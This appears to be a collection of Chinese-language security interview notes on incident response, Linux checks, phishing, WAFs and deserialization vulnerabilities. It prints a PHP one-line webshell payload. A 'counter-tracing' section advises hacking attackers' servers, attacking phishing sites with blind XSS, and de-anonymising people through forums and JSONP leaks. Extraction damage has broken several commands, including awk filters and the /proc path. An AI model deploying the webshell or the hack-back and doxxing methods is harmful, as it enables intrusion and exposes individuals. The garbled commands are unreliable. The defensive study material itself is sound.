chattr重要文件设置不可修改权限系统日志审计linux上设置系统日志策略配置文件系统日志 /var/log/messagecron日志/var/log/cron安全日志/var/log/secure设备和网络控制比如在涉密计算机上禁止访问外网为了避免用户绕过策略可以禁止用户修改IP删除默认路由配置避免利用默认路由探测网络禁止使用USB设备比如U盘禁止ping命令即禁用ICMP协议访问不让外部ping通服务器日志及木马被删除如何排查被攻击后日志文件和木马文件被删除会给排查工作带来很大的困难但还是有一些方法可以尝试查看系统备份如果您的系统进行了定期备份那么可以尝试从备份中恢复丢失的日志文件和木马文件。如果备份没有受到攻击那么这种方式可能会非常有效。恢复已删除文件一些数据恢复软件例如Recuva、EaseUS Data Recovery等可以恢复已删除的文件。您可以尝试使用这些软件来恢复被删除的文件。检查其他主机如果您的系统被集成到网络中可以检查其他主机是否有相同的攻击迹象和后门程序。对于攻击者来说攻击多台主机通常需要更多的时间和资源因此在其他主机上发现类似的攻击行为也许能够提供有用的信息。分析系统快照如果您的系统支持系统快照功能例如 Windows 系统还原点可以尝试回滚系统至之前的快照状态并分析该状态下的日志信息和系统状态以寻找攻击行为的证据。日志审计如果日志文件被删除可以尝试通过其他渠道收集日志信息并进行审计分析。例如可以检查网络流量、系统性能、系统进程等信息以确定是否存在异常行为。总之在日志文件和木马文件被删除的情况下需要采用其他方法来寻找攻击迹象和证据。同时为了避免这种情况的发生我们应该在系统中设置必要的日志轮转和备份策略并加强安全防御工作避免被攻击者入侵。安全设备告警安全设备报警是指安全设备例如入侵检测系统、防火墙、安全加固等监测到的与安全相关的事件或活动达到了预先设定的规则和阈值触发了警报通知。以下是一些处理安全设备报警的方法确认警告的真实性首先需要确认收到的警报信息是否为真实的安全事件需要对日志和其他相关信息进行分析和验证。如果发现确实存在安全问题则需要立即采取适当措施。优先级分类不同类型的安全事件具有不同的严重程度和威胁级别需要根据事件的类型、来源等因素进行分类和优先级排序并采取相应的措施进行处理。制定处理计划根据事件情况和优先级制定相应的处理计划和操作流程。这些计划可以包括隔离受感染主机、采取补救措施、收集证据等方面。跟踪事件进展在处理安全事件时需要跟踪事件的进展和结果并及时更新相关记录和文档。同时要保持与相关人员的沟通和协调以便及时解决问题。定期复查定期审查和分析系统和设备的报警记录和日志以及采取的应对措施和效果。这可以帮助发现系统中存在的风险和漏洞并及时加以修复和优化。总之在处理安全设备报警时需要快速响应、分类优先、制定计划等步骤以保障系统的安全性并且需要持续地监测和优化安全防御策略。Linux的 入侵排查思路1账号安全who 查看当前登录用户tty本地登陆 pts远程登录 w 查看系统信息想知道某一时刻用户的行为 uptime 查看登陆多久、多少用户负载 1、用户信息文件/etc/passwd root❌0:0:root:/root:/bin/bash account:password:UID:GID:GECOS:directory:shell 用户名密码用户ID组ID用户说明家目录登陆之后shell 注意无密码只允许本机登陆远程不允许登陆2、影子文件/etc/shadowroot: 6 6 6 oGs1PqhL2p3ZetrE$X7o7bzoouHQVSEmSgsYN5UD4.kMHx6qgbTqwNVC5oOAouXvcjQSt.Ft7ql1WpkopY0UV9ajBwUt1DpYxTCVvI/:16809:0:99999:7:::用户名加密密码密码最后一次修改日期两次密码的修改时间间隔密码有效期密码修改到期到的警告天数密码过期之后的宽限天数账号失效时间保留 /etc/passwd 存储一般的用户信息任何人都可以访问/etc/shadow 存储用户的密码信息只有 root 用户可以访问2.历史命令通过 .bash_history 查看帐号执行过的系统命令 1、root的历史命令 histroy 2、打开 /home 各帐号目录下的 .bash_history查看普通帐号的历史命令 历史操作命令的清除history -c 但此命令并不会清除保存在文件中的记录因此需要手动删除.bash_profile文件中的记录3.检查异常端口 netstat -antlp|more 查看下pid所对应的进程文件路径 运行ls -l /proc/ P I D / e x e 或 f i l e / p r o c / PID/exe或file /proc/ P I D / e x e 或 f i l e / p roc / PID/exe$PID 为对应的pid 号 4.检查异常进程 ps aux | grep pid 5.检查开机自启动项 开机启动配置文件 /etc/rc.local /etc/rc.d/rc[0~6].d6.检查定时任务 crontab -l 列出某个用户cron服务的详细内容 Tips默认编写的crontab文件会保存在 (/var/spool/cron/用户名 例如: /var/spool/cron/root crontab -r 删除每个用户cront任务(谨慎删除所有的计划任务) crontab -e 使用编辑器编辑当前的crontab文件 如 */1 \* * * * echo “hello world” /tmp/test.txt 每分钟写入文件*2、利用anacron实现异步定时任务调度重点关注/var/spool/cron//etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/ /etc/anacrontab /var/spool/anacron/*7.检查服务 chkconfig --list 命令可以查看系统运行的服务 8.检查异常文件 9.检查系统日志Linux应急措施Linux被入侵症状Linux常用排查命令系统信息查看当前系统状态 top 操作系统信息 uname -a 查看当前系统进程信息 ps 查看历史命令 history 列出本机所有的连接和监听的端口 netstat 查看谁在使用某个端口 lsof用户登录查看当前用户登录系统情况 who 分析超级权限账户 awk-F ‘{if$30print $1}’/etc/passwd 查看可登录的账户 cat/etc/passwd|grep ‘/bin/bash’ 查看用户错误的登录信息 lastb 查看所有用户最后的登录信息 lastlog 查看用户最近登录信息 last /var/log/ 其中/var/log/wtmp 存储登录成功的信息、btmp存储登录失败的信息、 utmp存储当前正在登录的信息 查看空口令账户 awk-F ‘length$20 {print $1}’/etc/shadowLinux基线规范1、共享账户检查2、多余账户锁定策略3、口令复杂度策略4、口令最长生存期策略5、安全日志完备性要求6、统一远程日志服务器配置7、设置 history 时间戳7、防止入侵防范关闭非必要的系统服务8、禁止 Control-Alt-Delete 键盘关闭命令十五、溯源篇溯源反制的思路1.攻击源捕获安全设备报警如扫描IP、威胁阻断、病毒木马、入侵事件等 日志与流量分析异常的通讯流量、攻击源与攻击目标等 服务器资源异常异常的文件、账号、进程、端口启动项、计划任务和服务等 邮件钓鱼获取恶意文件样本、钓鱼网站 URL 等 蜜罐系统获取攻击者 ID、电脑信息、浏览器指纹、行为、意图的相关信息 2.溯源反制IP 定位技术 根据IP定位物理地址–代理 IP 溯源案例通过 IP 端口扫描反向渗透服务器进行分析最终定位到攻击者相关信息 ID 追踪术 ID 追踪术搜索引擎、社交平台、技术论坛、社工库匹配 溯源案例利用 ID 从技术论坛追溯邮箱继续通过邮箱反追踪真实姓名通过姓名找到相关简历信息 网站 url 域名 Whois 查询–注册人姓名、地址、电话和邮箱 --域名隐私保护 溯源案例通过攻击 IP 历史解析记录/域名对域名注册信息进行溯源分析 恶意样本分析 提取样本特征、用户名、ID、邮箱、C2 服务器等信息–同源分析 溯源案例样本分析过程中发现攻击者的个人 ID 和 QQ成功定位到攻击者 社交账号 基于 JSONP 跨域获取攻击者的主机信息、浏览器信息、真实 IP 及社交信息等 利用条件可以找到相关社交网站的 jsonp 接口泄露敏感信息相关网站登录未注销 3.攻击者画像攻击路径 攻击目的拿到权限、窃取数据、获取利益、DDOS 等 网络代理代理 IP、跳板机、C2 服务器等 攻击手法鱼叉式邮件钓鱼、Web渗透、水坑攻击、近源渗透、社会工程等攻击者身份画像 虚拟身份ID、昵称、网名 真实身份姓名、物理位置 联系方式手机号、qq/微信、邮箱 组织情况单位名称、职位信息蓝队常用的反制方法有哪些a.蜜罐b.对攻击目标进行反渗透IP定位、IP端口扫描、Web站点渗透c.应用漏洞挖掘利用菜刀、Goby、Xray、蚁剑d.id-社交特征关联e.钓鱼网站-后台扫描、XSS盲打f.木马文件-同源样本关联-敏感字符串特征检测如何防御钓鱼邮件钓鱼邮件是一种常见的网络针对性攻击手段通常通过电子邮件发送虚假信息诱骗受害者提供个人敏感信息或进行非法行为。以下是几种发现和防御钓鱼邮件的方法查看发件人地址钓鱼邮件的发件人地址通常会伪装成合法、可信的机构或公司但是如果您仔细查看发件人地址就可能发现其不是该机构或公司真正的域名。检查链接地址钓鱼邮件中通常会包含可疑的链接如果您将鼠标悬停在链接上就可以看到链接的真实地址。如果该地址与邮件内容不符就可能是钓鱼邮件。注意邮件内容钓鱼邮件通常会给人留下一种紧急、必须立即采取行动的感觉从而诱骗用户点击链接或执行某些操作。因此如果您收到这样的邮件请仔细阅读邮件内容并多加思考和确认。尽量避免下载附件钓鱼邮件通常会携带恶意附件如果您无法确认邮件的真实性最好不要下载或打开这些附件以免被感染。安装反钓鱼软件有一些反钓鱼软件可以帮助用户检测和拦截钓鱼邮件例如 Google 的Password Alert 等。总之发现钓鱼邮件需要多加警惕和注意在收到可疑邮件时应该仔细查看邮件内容和相关信息并尽可能采取措施避免被钓鱼攻击。钓鱼邮件处置屏蔽办公区域对钓鱼邮件内容涉及站点、URL 访问根据办公环境实际情况可以在上网行为管理、路由器、交换机上进行屏蔽邮件内容涉及域名、IP 均都应该进行屏蔽对访问钓鱼网站的内网 IP 进行记录以便后续排查溯源可能的后果屏蔽钓鱼邮件屏蔽钓鱼邮件来源邮箱域名屏蔽钓鱼邮件来源 IP有条件的可以根据邮件内容进行屏蔽删除还在邮件服务器未被客户端收取钓鱼邮件处理接收到钓鱼邮件的用户根据钓鱼邮件发件人进行日志回溯此处除了需要排查有多少人接收到钓鱼邮件之外还需要排查是否公司通讯录泄露。采用 TOP500 姓氏撞库发送钓鱼邮件的攻击方式相对后续防护较为简单。如果发现是使用公司通讯录顺序则需要根据通讯录的离职情况及新加入员工排查通讯录泄露时间。毕竟有针对性的社工库攻击威力要比 TOP100、TOP500 大很多通知已接收钓鱼邮件的用户进行处理删除钓鱼邮件系统改密全盘扫毒后续溯源、员工培训提升安全意识如何发现钓鱼邮件发现途径如下邮件系统异常登录告警、员工上报、异常行为告警、邮件蜜饵告警推荐接入微步或奇安信的情报数据。对邮件内容出现的 URL 做扫描可以发现大量的异常链接十六、其他正向代理和反向代理的区别正向代理即是客户端代理, 代理客户端, 服务端不知道实际发起请求的客户端反向代理即是服务端代理, 代理服务端, 客户端不知道实际提供服务的服务端正向shell和反向shell的区别正向Shell攻击者连接被攻击者机器可用于攻击者处于内网被攻击者处于公网的情况。反向Shell被攻击者主动连接攻击者可用于攻击者处于外网被攻击者处于内网的情况。讲一讲java反序列化的原理Java反序列化漏洞是指恶意用户通过发送精心构造的序列化数据并触发其反序列化过程从而执行未经授权的代码或操作。攻击者可以利用此漏洞来执行远程命令、绕过应用程序的安全检查、窃取敏感信息等攻击。如果Java应用对用户输入即不可信数据做了反序列化处理那么攻击者可以通过构造恶意输入让反序列化产生非预期的类或对象这个类或对象在产生过程中就有可能带来任意代码执行。shiro反序列化原理Shiro是Apache下的一个开源Java安全框架执行身份认证授权密码和会话管理。shiro在用户登录时除了账号密码外还提供了可传递选项remember me。用户在登录时如果勾选了remember me选项那么在下一次登录时浏览器会携带cookie中的remember me字段发起请求就不需要重新输入用户名和密码。fastjson反序列化原理fastjson是阿里巴巴开发的一款将json字符串和java对象进行序列化和反序列化的开源json解析库。fastjson提供了autotype功能在请求过程中我们可以在请求包中通过修改type的值来反序列化为指定的类型而fastjson在反序列化过程中会设置和获取类中的属性如果类中存在恶意方法就会导致代码执行等这类问题。序列化和反序列化的概念序列化把对象转化为可传输的字节序列过程称为序列化。反序列化把字节序列还原为对象的过程称为反序列化。简单讲一下反序列化漏洞序列化是指程序将对象转化为字节序列从而便于存储运输的一种方式反序列化则与其相反即将字节序列转化为对象供程序使用。程序在进行反序列化时会调用一些函数比如常见的PHP 反序列化函数 unserialize()以及一些常见的魔术方法比如构造函数*construct()析构函数destruct() *wakeup()toString(0) sleep0等等。如果这些函数在传递参数时没有进行严格的过滤措施那么攻击者就可以构造恶意代码并将其序列化后传入函数中从而导致反序列化漏洞F5 LTM解码法当服务器使用F5 LTM做负载均衡时通过对set-cookie关键字的解码真实ip也可被获取例如Set-Cookie: BIGipServerpool_8.29_8030487098378.24095.0000先把第一小节的十进制数即487098378取出来然后将其转为十六进制数1d08880a接着从后至前以此取四位数出来也就是0a.88.08.1d最后依次把他们转为十进制数10.136.8.29也就是最后的ip。未授权访问漏洞未授权访问是系统对用户限制不全或者无限制可以让任意用户或者限制访问用户访问到需要权限认证的地址。未授权访问通常是会泄露用户信息系统信息。某些服务和系统中未授权访问还可以执行系统命令操作系统文件导致系统的整体安全遭到破坏。 详细链接: link常见的未授权访问漏洞有哪些a.MongoDB未授权访问漏洞b.Redis未授权访问漏洞c.Memcached未授权访问漏洞d.JBOSS未授权访问漏洞e.VNC未授权访问漏洞f.Docker未授权访问漏洞g.ZooKeeper未授权访问漏洞h.Rsync未授权访问漏洞常见的逻辑漏洞有哪些验证码相关的例如重复利用验证码无效等越权漏洞等等 越权漏洞 密码修改 密码找回 验证码漏洞 支付漏洞 投票/积分/抽奖 短信轰炸代码执行、命令执行、文件读取的函数有哪些代码执行eval、call_user_func、call_user_func_array等文件读取fopen()、readfile()、fread()、file()、show_source()等命令执行system()、exec()、shell_exec()、passthru()、pcntl_exec()等常见的中间件和对应漏洞有哪些•IISPUT漏洞、短文件名猜解、远程代码执行、解析漏洞•Apache解析漏洞、目录遍历•Nginx文件解析、目录遍历、CRLF注入、目录穿越•Tomcat远程代码执行、war后门文件部署•JBoss反序列化漏洞、war后门文件部署•WebLogic反序列化漏洞、SSRF任意文件上传、war后门文件部署•ApacheShiro反序列化漏洞ShirorememberMeShiro-550、ShiroPaddingOracleAttack(Shiro-721)fastjson漏洞利用原理在请求包里面中发送恶意的 json 格式 payload漏洞在处理 json 对象的时候 没有对type 字段进行过滤从而导致攻击者可以传入恶意的 TemplatesImpl 类而 这个类有一个字段就是_bytecodes有部分函数会根据这个_bytecodes 生成 java 实例这就达到 fastjson 通过字段传入一个类再通过这个类被生成时执行构造函数。shiro漏洞hiro是Java平台上一个流行的安全框架用于身份验证、授权和会话管理等功能。然而Shiro也存在一些安全漏洞攻击者可以利用这些漏洞来绕过身份验证、执行未授权操作或者获取敏感信息。以下是一些已知的Shiro漏洞CVE-2020-13933该漏洞允许攻击者通过构造特定的请求来绕过Shiro的身份验证和授权机制从而执行未授权操作。攻击者可以利用这个漏洞来获取敏感信息或者执行恶意操作。CVE-2020-17523这个漏洞存在于Shiro的RememberMe功能中攻击者可以通过发送特制的RememberMe Cookie来绕过身份验证从而获取未授权访问。CVE-2020-11989该漏洞涉及Shiro的默认配置在某些情况下攻击者可以利用该漏洞来绕过身份验证和授权机制。这些漏洞都已经得到修复建议使用Shiro的用户及时升级到最新版本以修复这些安全漏洞。同时还应该遵循以下最佳实践来加强Shiro的安全性及时更新Shiro版本保持Shiro库的最新版本以获得已知漏洞的修复和安全增强。配置安全的RememberMe功能如果使用Shiro的RememberMe功能请确保使用安全的密钥和加密机制以防止RememberMe Cookie被篡改或伪造。妥善配置身份验证和授权确保正确配置Shiro的身份验证和授权机制并限制用户的访问权限避免未授权访问。加强输入验证和过滤对于用户输入的数据进行严格的验证和过滤以防止攻击者构造恶意输入进行攻击。定期审计和监控监控Shiro的日志和用户活动并进行定期审计以检测潜在的安全问题和异常行为。总之使用Shiro时要保持关注安全漏洞的公告和修复并采取适当的措施来加强Shiro的安全性以确保应用程序的安全性和保护用户的敏感信息。如何发现shiro漏洞登陆失败时候会返回 rememberMedeleteMe 字段或者使用 shiroScan 被动扫描去发现哪些漏洞会被高频利用于打点a.ApacheShiro相关漏洞b.Fastjson漏洞c.Log4jd.上传漏洞e.边界网络设备资产弱口令ApacheShiro相关漏洞Apache Shiro 是一个强大的开源 Java 安全框架用于提供身份验证、授权、会话管理和加密等功能。尽管 Shiro 在安全性方面具有良好的声誉但在过去的一些版本中也发现了一些安全漏洞。以下是一些与 Apache Shiro 相关的已知漏洞CVE-2020-11989该漏洞存在于 Apache Shiro 的默认配置中攻击者可以利用该漏洞来绕过身份验证和授权机制从而获得未授权访问权限。CVE-2016-4437此漏洞允许攻击者通过发送恶意序列化对象利用 Apache Shiro 的 RememberMe 功能以执行远程代码执行攻击。CVE-2014-0075这个漏洞影响 Apache Shiro 在与 Spring Framework 集成时的安全性攻击者可以利用该漏洞绕过授权限制。这些漏洞在发现后都得到了修复。如果您使用 Apache Shiro请确保升级到最新版本以修复这些漏洞。此外以下是一些建议来增强 Apache Shiro 的安全性及时更新 Apache Shiro保持 Apache Shiro 库的最新版本以获取已知漏洞的修复和安全增强。定期审计和监控监控 Apache Shiro 的日志和用户活动并进行定期审计以检测潜在的安全问题和异常行为。配置安全的 RememberMe 功能如果使用 Apache Shiro 的 RememberMe 功能请确保使用安全的密钥和加密机制以防止 RememberMe Cookie 被篡改或伪造。加强输入验证和过滤对于用户输入的数据进行严格的验证和过滤以防止攻击者构造恶意输入进行攻击。使用安全的序列化机制如果您使用了 Shiro 的序列化功能请确保使用安全的序列化机制避免受到序列化漏洞的影响。确保您遵循最佳实践并保持关注 Apache Shiro 的安全公告以及及时更新和修复任何已知的漏洞这样可以增强您应用程序的安全性。Fastjson漏洞原理讲一讲log4j RCE?Log4j 是Apache 的一个开源项目是一款基于Java 的开源日志记录工具。该漏洞主要是由于日志在打印时当遇到${后以:号作为分割将表达式内容分割成两部分前面一部分prefix后面部分作为key然后通过prefix去找对应的lookup通过对应的lookup实例调用lookup方法最后将key作为参数带入执行引发远程代码执行漏洞。你在渗透测试中常用到的工具了解安全设备吗入侵防御系统IPS是计算机网络安全设施是对防病毒软件和防火墙的补充。入侵预防系统是一部能够监视网络或网络设备的网络数据传输行为的计算机网络安全设备能够即时的中断、调整或隔离一些不正常或是具有伤害性的网络数据传输行为。入侵检测系统IDS积极主动的防护措施按照一定的安全策略通过软件硬件对网络系统的运行进行实时的监控尽可能地发现网络攻击行为积极主动的处理攻击保证网络资源的机密性完整性和可用性。防火墙防火墙是位于两个(或多个)网络间实行网络间访问或控制的一组组件集合之硬件或软件。隔离网络制定出不同区域之间的访问控制策略来控制不同信任程度区域间传送的数据流。数据库审计系统是对数据库访问行为进行监管的系统通过镜像或者探针的方式采集所有数据库的访问流量并基于SQL语法语义的解析技术记录下对数据库所有访问和操作行为例如访问数据的用户IP账号时间等等对数据进行操作的行为等等。日志审计系统日志审计系统能够通过主被动结合的手段实时且不间断的采集用户网络中不同厂商的安全设备网络设备主机操作系统以及各种应用系统产生的海量日志信息并将这些信息汇集到审计中心进行集中化存储备份查询审计告警响应并出具丰富的报表报告获悉全网的整体安全运行态势同时满足等保关于安全管理中心的日志保存时间大于6个月的要求。堡垒机是针对内部运维人员的运维安全审计系统。主要功能是对运维人员的运维操作进行审计和权限控制(比如要登录某些平台或者系统只能通过堡垒机才可以不用堡垒机是无法访问的)。同时堡垒机还有账号集中管理单点登录(在堡垒机上登录即可实现对多个其他平台的无密登录)等功能。漏洞扫描系统漏洞扫描工具或者设备是基于漏洞数据库通过扫描等手段对指定的远程或本地计算机系统的安全脆弱性进行检测发现可利用漏洞的一种安全检测系统(我们常用的针对WEB站点进行扫描的工具和此处漏洞扫描系统不是一个概念)。数据安全态势感知平台以大数据平台为基础通过收集多元异构的海量日志利用关联分析机器学习威胁情报可视化等技术帮助用户持续监测网络安全态势实现从被动防御向积极防御的进阶。终端安全管理系统是集防病毒终端安全管控终端准入终端审计外设管控EDR等功能于一体兼容不同操作系统和计算机平台帮助客户实现平台一体化功能一体化数据一体化的终端安全立体防护。WAFWAF是以网站或应用系统为核心的安全产品通过对HTTP或HTTPS的Web攻击行为进行分析并拦截有效的降低网站安全风险。产品主要部署在网站服务器的前方。通过特征提取和分块检索技术进行模式匹配来达到过滤分析校验网络请求包的目的在保证正常网络应用功能的同时隔绝或者阻断无效或者非法的攻击请求。蜜罐蜜罐是一种安全威胁的主动防御技术它通过模拟一个或多个易受攻击的主机或服务来吸引攻击者捕获攻击流量与样本发现网络威胁提取威胁特征蜜罐的价值在于被探测攻陷。使用过哪些安全设备了解过WAF吗绕过WAF的方法WAF的分类如何拦截攻击WAFWeb 应用程序防火墙产品通常可以分为以下几种分类基于签名的 WAF基于签名的 WAF 通过检测请求中是否包含已知漏洞的特征来拦截攻击。这种类型的 WAF 可以快速识别和阻止已知的攻击方式。基于行为的 WAF基于行为的 WAF 使用机器学习、人工智能等技术来分析请求的行为模式并判断其是否具有攻击性。这种类型的 WAF 能够较好地识别未知攻击。综合型 WAF综合型 WAF 结合了基于签名和基于行为两种技术能够同时检测已知攻击和未知攻击提供更加全面的保护。WAF 产品一般通过拦截攻击请求来保护 Web 应用程序。具体的拦截方式包括黑名单过滤根据已知的攻击方式设置黑名单规则对符合规则的请求进行拦截。白名单过滤对请求进行白名单过滤只允许符合规则的请求通过。存储过程注入防护对 SQL 注入进行防护。WAF 可以检测并拦截具有攻击意图的 SQL 语句并对其进行相应的修复和防护。跨站脚本XSS防护WAF 可以检测并过滤包含恶意 JavaScript 代码的请求并防止 XSS 攻击。防止文件上传漏洞WAF 可以检测并拦截包含恶意文件的请求从而避免文件上传漏洞导致的攻击。总之WAF 产品可以有效地保护 Web 应用程序免受各种类型的攻击。但是需要注意的是WAF 并不是万能的仍然需要结合其他安全措施来保障 Web 应用程序的安全。常用的webshell检测工具a.D盾b.河马WEBSHELLc.百度WEBDIRd.WebShellDetectore.SangforWebShellKill[深信服]f.PHPMalwareFinder[支持Linux]网站被上传webshell如何处理1.首先关闭网站下线服务。有必要的话将服务器断网隔离。2.手工结合工具进行检测。工具方面比如使用D盾webshellkill河马webshell查杀百度在线webshell查杀等工具对网站目录进行排查查杀如果是在护网期间可以将样本备份再进行查杀。手工方面对比未上传webshell前的备份文件从文件甚至代码层面进行对比检查有无后门程序或者其他异常文件实在不行就直接用备份文件替换了。3.加强安全策略比如定期备份网站配置文件及时安装服务器补丁定期更新组件以及安全防护软件定期修改密码等等措施。有了解过态势感知产品吗360态势感知由中国著名安全厂商360推出的产品主要提供网络威胁查询、漏洞扫描、流量分析等功能同时集成了各种安全情报和指标可以为用户提供全面的安全态势分析和预警服务。腾讯云安全大脑由腾讯云推出的产品利用AI、机器学习等技术对攻击进行实时监测和分析提供包括漏洞扫描、风险评估、异常检测等一系列安全服务。云锁事件响应中心由阿里云推出的产品提供网络空间威胁和安全事件的监测、预警、应急响应等服务。该产品采用 AI算法进行态势感知并可以自动化响应安全事故。北京赛迪态势感知系统由北京赛迪安全科技股份有限公司开发的产品支持网络威胁情报搜集、风险事件自动识别、威胁行为关联分析等功能可为企业提供全生命周期的网络安全保护。启明星辰安全态势感知由启明星辰推出的产品提供整体安全态势感知、针对性攻击检测、应急响应等功能可帮助用户实现从被动防御到主动防御的转变。这些产品都采用了先进的机器学习和人工智能技术可以自动化地分析和识别网络威胁并及时发出预警或者采取应急措施。同时这些产品还具备可视化的操作界面用户可以通过简单的操作就可以了解整个系统的安全情况并做出相应的决策讲一讲sqlmap中的risk和level的区别risk风险等级 越大则测试的语句越多 强调数量level探测的深度 越大则测试的范围越广 例如cookie host 等等都会测试 强调范围如何处理.exe文件首先看它的来源和去向然后可以下载但不运行放入微步沙箱中看是否有后门若有后门就用 IDA 反汇编得到恶意攻击者的有用信息再进一步描绘出攻击者画像进行溯源 .exe 文件是 Windows 上的可执行文件通常包含应用程序或者安装程序等内容。如果您在电子邮件或者网络上收到了 .exe 文件需要格外小心因为它们可能包含病毒、恶意软件或者其他危险物品。以下是几种处理方法不要直接运行不要轻易双击或者打开未知来源的 .exe 文件因为它们可能会启动恶意软件并对您的系统造成损害。如果您必须要运行这些.exe 文件请先进行杀毒软件扫描和检测操作。使用虚拟机如果您需要测试某个 .exe文件的行为和效果可以考虑使用虚拟机。虚拟机可以将一个完整的操作系统运行在一个软件容器中使得用户可以在其中安全地运行可疑的 .exe文件并且不会影响主机系统的安全性。上传到在线扫描服务平台一些在线杀毒软件平台例如 VirusTotal 等提供了在线扫描可疑文件的服务。如果您不确定一个 .exe文件是否安全可以上传到这些平台进行扫描以获取更多的信息和建议。将文件发送给安全专家如果您无法确定.exe文件的安全性可以将其发送给安全专家进行分析。安全专家可以根据其行为特征和结构等信息对该文件进行深度分析以确定是否存在潜在的安全威胁。 总之在处理未知来源的 .exe 文件时需要注意谨慎并采取必要的安全措施以确保您的系统不会被攻击或感染。如果您遇到可疑的 .exe 文件请务必进行杀毒软件扫描并尽可能获取更多的信息和建议。怎么确定一个网站是不是站库分离1查询web服务器名LENOVO-GH*****—select servername;2查询数据库服务器名DESKTOP-1HV—select host_name();对比两个查询结果即可判断。相同则同站同库不同就是站库分离知道那些防火墙设备常见的 HW 设备有公安部网防G01、K01、360网康/网神防火墙、微步威胁情报、安恒云-Web应用防火墙玄武盾、默安蜜罐、知道创宇蜜罐、山石防火墙 NGAF/NGFW下一代 Web 应用防火墙Next Generation Application Firewall通防火墙和下一代防火墙的区别聚合了以下功能IDS HIDS基于主机的入侵检测系统 NIDS基于网络的入侵检测系统 HIDSNIDS基于混合数据源的入侵检测系统 IPS入侵防御系统 AV反病毒系统 EDR主机安全管理\终端检测和响应EDR 实时监测终端上发生的各类行为采集终端运行状态在后端通过大数据安全分析、机器学习、沙箱分析、行为分析、机器学习等技术提供深度持续监控、威胁检测、高级威胁分析、调查取证、事件响应处置、追踪溯源等功能可第一时间检测并发现恶意活动包括已知和未知威胁并快速智能地做出响应全面赋予终端主动、积极的安全防御能力简单来说就是给内网环境中所有主机安装管理软件终端可以在管理平台集中管理和数据分析过滤基本所有安全厂商都有自己的 EDR 产品运维审计和管理平台堡垒机DAS数据库安全审计平台LAS日志审计安全平台AC上网行为管理系统伪装欺骗系统蜜罐、蜜网SIP安全态势感知平台这个算是让整套系统性能得到提升的灵魂了定位为客户的安全大脑是一个集检测、可视、响应处置于一体的大数据安全分析平台。产品以大数据分析为核心支持主流的安全设备、网络设备、操作系统等多源数据接入利用大数据、关联分析、告警降噪等技术实现海量数据的统一挖掘分析防火墙报警如何确定是不是误判一般情况下真实攻击不可能只持续一次它一定是长时间、周期性、多 IP 的进行攻击比如数据包或者日志你的分析思路是什么以及你会用到哪些工具或者那些网站进行查询用流量监测的安全设备比如天眼查看报文分析报文里和 host 和网站目录路径查看是否可疑使用微步查询 host 是否为恶意使用 wireshark 对数据包深度分析看一下请求的网站路径源 IP 与目的 IP 地址host 字段的值以及发包内容等工具有 wireshark网站的话微步在线等威胁情报中心文件上传和命令执行有看过相关日志吗文件可能在系统有上传功能或者有文本编辑器看一下是否有 base64 加密或者 url 加密解码验证一下是否有恶意代码系统日志有没有 web 容器做了一些危险行为比如 bash 反弹 shell 等网络应用日志有没有异常的网站文件类似 webshell 等就有可能是命令执行windows日志分析工具Event Log Explorerwebshell分析思路1.基于webshell特征检测 常见webshell函数1存在系统调用的命令执行函数如eval、system、cmd_shell、assert等2存在系统调用的文件操作函数如fopen、fwrite、readdir等3存在数据库操作函数调用系统自身的存储过程来连接数据库操作4具备很深的自身隐藏性、可伪装性可长期潜伏到web源码中5衍生变种多可通过自定义加解密函数、利用xor、字符串反转、压缩、截断重组等方法来绕过检测基于webshell工具特征的检测webshell的访问特征1少量的IP对其发起访问2总的访问次数少3该页面属于孤立页面给你一个比较大的日志应该如何分析攻击规则匹配通过正则匹配日志中的攻击请求统计方法统计请求出现次数次数少于同类请求平均次数则为异常请求白名单模式为正常请求建立白名单不在名单范围内则为异常请求HMM 模型类似于白名单不同点在于可对正常请求自动化建立模型从而通过正常模型找出不匹配者则为异常请求借助日志分析工具如 LogForensics 腾讯实验室设备出现了误报如何处置日志先去查看设备的完整流量日志等信息。在护网过程中如果确实存在异常流量应当及时进行上报确认是误报后做好事件记录十七、nmap 扫描基础命令sT TCP (全)连接扫描准确但留下大量日志记录 -sS TCP SYN (半)扫描速度较快不会留下日志 -sN null 扫描标志位全为 0不适用 Windows -sF FIN 扫描标志位 FIN1不适用 Windows -O 查看目标主机系统版本 -sV 探测服务版本 -A 全面扫描你还用过其他态势感知的产品吗ipsidshids堡垒机等命令行工具用的什么比较多xshell、xftp、finalshell你用过微步吗微步在线是一个威胁情报中心可以通过 ip 或域名查询其是不是恶意的对于判断恶意链接具有一定的参考性他还有一个插件可以在页面选中就能进行查询还是一个比较好用的工具横向越权漏洞的修复横向越权横向越权指的是攻击者尝试访问与他拥有相同权限的用户的资源纵向越权纵向越权指的是一个低级别攻击者尝试访问高级别用户的资源对于纵向越权我们可以通过设置用户角色为不同的角色提供不同的权限来避免为了防止横向越权我们可以使用缓存来进行辅助当登录成功或者进行操作时我们在缓存中存储一对由用户名和一个唯一的数字组成的数据token然后返回放入的唯一数据在重置密码时我们的参数不仅需要用户名和密码还需要前面生成的唯一数字根据用户名在缓存中取出对应的数字如果取出的数字和参数中传入的想等则证明重置的当前用户的密码否则不是且不予以重置如何反爬后台对访问进行统计如果单个 IP 访问超过阈值予以封锁后台对访问进行统计如果单个 session 访问超过阈值予以封锁后台对访问进行统计如果单个 userAgent 访问超过阈值予以封锁网页状态码403 禁止 服务器拒绝请求。 404 未找到 服务器找不到请求的网页。 301 永久移动 请求的网页已永久移动到新位置。 服务器返回此响应对 GET 或 HEAD 请求的响应时会自动将请求者转到新位置。 302 临时移动 服务器目前从不同位置的网页响应请求但请求者应继续使用原有位置来进行以后的请求。 500 服务器内部错误 服务器遇到错误无法完成请求。 501 尚未实施 服务器不具备完成请求的功能。 例如服务器无法识别请求方法时可能会返回此代码。 502 错误网关 服务器作为网关或代理从上游服务器收到无效响应。 503 服务不可用 服务器目前无法使用由于超载或停机维护。 通常这只是暂时状态。 504 网关超时 服务器作为网关或代理但是没有及时从上游服务器收到请求。 505 HTTP 版本不受支持 服务器不支持请求中所用的 HTTP 协议版本。PHP一句话木马?php eval($\\\_POST\[shy\]);?常见OA系统PHP通达OA、泛微 EofficeJava泛微OA/云桥、致远OA、蓝凌OA、用友OAASP启莱OAPowershell了解过吗简介PowerShell 是一种命令行外壳程序和脚本环境主要用于Windows计算机方便管理员进行系统管理并有可能在未来取代Windows上的默认命令提示符。PowerShell脚本因其良好的功能特性常用于正常的系统管理和安全配置工作。使用常见的操作 pwd ls cd mkdir rm get-process获取所有进程信息 get-date获取当前时间信息 get-host获取当前主机信息 